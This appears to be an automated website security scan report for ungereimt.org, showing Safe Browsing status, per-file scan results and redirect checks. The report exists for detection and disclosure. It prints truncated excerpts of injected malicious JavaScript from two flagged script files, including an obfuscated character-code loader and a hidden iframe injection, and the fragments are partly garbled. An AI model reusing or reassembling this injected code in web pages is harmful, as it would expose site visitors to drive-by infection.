Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ungereimt.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ungereimt.org/ | 200 OK Content-Length: 3467 Content-Type: text/html | clean |
http://ungereimt.org/scripts/javascript.js | 200 OK Content-Length: 21952 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function externalLinks() { if (!document.getElementsByTagName) return; var anchors = document.getElementsByTagName("a"); for (var i=0; i<anchors.length; i++) { var anchor = anchors[i]; if (anchor.getAttribute("href") && anchor.getAttribute("rel") == "external") anchor.target = "_blank"; } } window.onload = externalLinks; if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") dec if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://ungereimt.org/scripts/countdown.js | 200 OK Content-Length: 7580 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) cat: /var/www/vhosts/ungereimt.org/httpdocs/scripts/countdown.js: No such file or directory filemng: Error occured during /bin/cat command.try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525 if(f)e(s);} Antivirus reports:
| ||
http://ungereimt.org/index.php | 200 OK Content-Length: 3467 Content-Type: text/html | clean |
http://ungereimt.org/aktuell.php | 200 OK Content-Length: 4824 Content-Type: text/html | clean |
http://ungereimt.org/organisation.php | 200 OK Content-Length: 4575 Content-Type: text/html | clean |
http://ungereimt.org/reisefuehrer.php | 200 OK Content-Length: 5428 Content-Type: text/html | clean |
http://ungereimt.org/anfahrt.php | 200 OK Content-Length: 3466 Content-Type: text/html | clean |
http://ungereimt.org/kontakt.php | 200 OK Content-Length: 3505 Content-Type: text/html | clean |
http://ungereimt.org/test404page.js | 404 Not Found Content-Length: 275 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ungereimt.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 21:35:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3467
Content-Type: text/html
X-Powered-By: PleskLin
...3467 bytes of data.
GET / HTTP/1.1
Host: ungereimt.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 21:35:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3467
Content-Type: text/html
X-Powered-By: PleskLin
...3467 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ungereimt.org
Referer: http://www.google.com/search?q=ungereimt.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ungereimt.org
Referer: http://www.google.com/search?q=ungereimt.org
Result:
The result is similar to the first query. There are no suspicious redirects found.